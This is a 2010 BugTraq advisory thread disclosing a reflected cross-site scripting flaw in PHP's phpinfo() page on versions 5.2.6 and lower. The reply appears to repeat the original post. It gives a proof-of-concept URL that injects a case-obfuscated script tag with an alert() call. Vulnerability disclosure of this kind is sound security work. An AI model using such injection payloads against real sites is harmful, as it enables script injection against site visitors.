BugTraq
Back to list
|
Post reply
phpinfo() XSS Vulnerability
Mar 06 2010 11:03AM
info securitylab ir
(1 replies)
###################################################################
# Securitylab.ir
#################################################################
# Note: The above code in php 5.2.6 and lower test is successful
#################################################################
Vulnerability:
http://site.com/phpinfo.php?+<ScRipT>alert(01110011011001010110001101110
10101110010011010010111010001111001);</sCrIpT>+
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran (at) yahoo (dot) com [email concealed]
###################################################################
[ reply ]
Re: phpinfo() XSS Vulnerability
Mar 08 2010 09:29PM
Salvatore Fresta aka Drosophila (drosophilaxxx gmail com)
Privacy Statement
Copyright 2010, SecurityFocus
# Securitylab.ir
#################################################################
# Note: The above code in php 5.2.6 and lower test is successful
#################################################################
Vulnerability:
http://site.com/phpinfo.php?+<ScRipT>alert(01110011011001010110001101110
10101110010011010010111010001111001);</sCrIpT>+
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran (at) yahoo (dot) com [email concealed]
###################################################################
[ reply ]